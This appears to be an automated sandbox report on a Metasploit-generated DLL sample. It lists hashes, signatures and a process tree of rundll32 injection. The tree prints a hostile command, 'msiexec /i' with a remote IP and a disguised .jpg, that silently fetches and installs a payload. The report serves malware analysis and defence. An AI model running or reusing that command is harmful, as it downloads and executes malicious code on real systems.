Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
10-09-2024 23:27
Behavioral task
behavioral1
Sample
d9337ff3c22d2a4258890fd38c5e7d7f_JaffaCakes118.dll
Resource
win7-20240708-en
windows7-x64
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
d9337ff3c22d2a4258890fd38c5e7d7f_JaffaCakes118.dll
Resource
win10v2004-20240802-en
windows10-2004-x64
7 signatures
150 seconds
General
-
Target
d9337ff3c22d2a4258890fd38c5e7d7f_JaffaCakes118.dll
-
Size
5KB
-
MD5
d9337ff3c22d2a4258890fd38c5e7d7f
-
SHA1
6dae55e6a58b612fedb42ebb73a77f9c4b932e27
-
SHA256
12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5
-
SHA512
166d9dd0c11cc8d685868e976014938d1abfbb087485324f720b76002e44250309e618622461b6203ea6470dedec62002bea3bda32f4ebf7ef385c78327315ac
-
SSDEEP
24:ev1GSFGFajE/K3tQ3zSaJ2IkM6Pv617s3h/LjpKpuMAmwyhZojsYV:qFGFajFK3zSIe7h/TMXhZogYV
Score
10/10
Malware Config
Extracted
Family
metasploit
Version
windows/single_exec
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Use of msiexec (install) with remote resource 1 IoCs
pid Process 2024 msiexec.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2160 msiexec.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2368 set thread context of 2408 2368 rundll32.exe 31 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeShutdownPrivilege 2024 msiexec.exe Token: SeIncreaseQuotaPrivilege 2024 msiexec.exe Token: SeRestorePrivilege 2160 msiexec.exe Token: SeTakeOwnershipPrivilege 2160 msiexec.exe Token: SeSecurityPrivilege 2160 msiexec.exe Token: SeCreateTokenPrivilege 2024 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2024 msiexec.exe Token: SeLockMemoryPrivilege 2024 msiexec.exe Token: SeIncreaseQuotaPrivilege 2024 msiexec.exe Token: SeMachineAccountPrivilege 2024 msiexec.exe Token: SeTcbPrivilege 2024 msiexec.exe Token: SeSecurityPrivilege 2024 msiexec.exe Token: SeTakeOwnershipPrivilege 2024 msiexec.exe Token: SeLoadDriverPrivilege 2024 msiexec.exe Token: SeSystemProfilePrivilege 2024 msiexec.exe Token: SeSystemtimePrivilege 2024 msiexec.exe Token: SeProfSingleProcessPrivilege 2024 msiexec.exe Token: SeIncBasePriorityPrivilege 2024 msiexec.exe Token: SeCreatePagefilePrivilege 2024 msiexec.exe Token: SeCreatePermanentPrivilege 2024 msiexec.exe Token: SeBackupPrivilege 2024 msiexec.exe Token: SeRestorePrivilege 2024 msiexec.exe Token: SeShutdownPrivilege 2024 msiexec.exe Token: SeDebugPrivilege 2024 msiexec.exe Token: SeAuditPrivilege 2024 msiexec.exe Token: SeSystemEnvironmentPrivilege 2024 msiexec.exe Token: SeChangeNotifyPrivilege 2024 msiexec.exe Token: SeRemoteShutdownPrivilege 2024 msiexec.exe Token: SeUndockPrivilege 2024 msiexec.exe Token: SeSyncAgentPrivilege 2024 msiexec.exe Token: SeEnableDelegationPrivilege 2024 msiexec.exe Token: SeManageVolumePrivilege 2024 msiexec.exe Token: SeImpersonatePrivilege 2024 msiexec.exe Token: SeCreateGlobalPrivilege 2024 msiexec.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 1724 wrote to memory of 2368 1724 rundll32.exe 30 PID 1724 wrote to memory of 2368 1724 rundll32.exe 30 PID 1724 wrote to memory of 2368 1724 rundll32.exe 30 PID 1724 wrote to memory of 2368 1724 rundll32.exe 30 PID 1724 wrote to memory of 2368 1724 rundll32.exe 30 PID 1724 wrote to memory of 2368 1724 rundll32.exe 30 PID 1724 wrote to memory of 2368 1724 rundll32.exe 30 PID 2368 wrote to memory of 2408 2368 rundll32.exe 31 PID 2368 wrote to memory of 2408 2368 rundll32.exe 31 PID 2368 wrote to memory of 2408 2368 rundll32.exe 31 PID 2368 wrote to memory of 2408 2368 rundll32.exe 31 PID 2368 wrote to memory of 2408 2368 rundll32.exe 31 PID 2368 wrote to memory of 2408 2368 rundll32.exe 31 PID 2368 wrote to memory of 2408 2368 rundll32.exe 31 PID 2368 wrote to memory of 2408 2368 rundll32.exe 31 PID 2408 wrote to memory of 2024 2408 rundll32.exe 32 PID 2408 wrote to memory of 2024 2408 rundll32.exe 32 PID 2408 wrote to memory of 2024 2408 rundll32.exe 32 PID 2408 wrote to memory of 2024 2408 rundll32.exe 32 PID 2408 wrote to memory of 2024 2408 rundll32.exe 32 PID 2408 wrote to memory of 2024 2408 rundll32.exe 32 PID 2408 wrote to memory of 2024 2408 rundll32.exe 32
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\d9337ff3c22d2a4258890fd38c5e7d7f_JaffaCakes118.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\d9337ff3c22d2a4258890fd38c5e7d7f_JaffaCakes118.dll,#12⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\SysWOW64\msiexec.exemsiexec /i http://23.227.200.242:2650/hbYDuh9tfbBfVYg7up.jpg /q4⤵
- Use of msiexec (install) with remote resource
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2160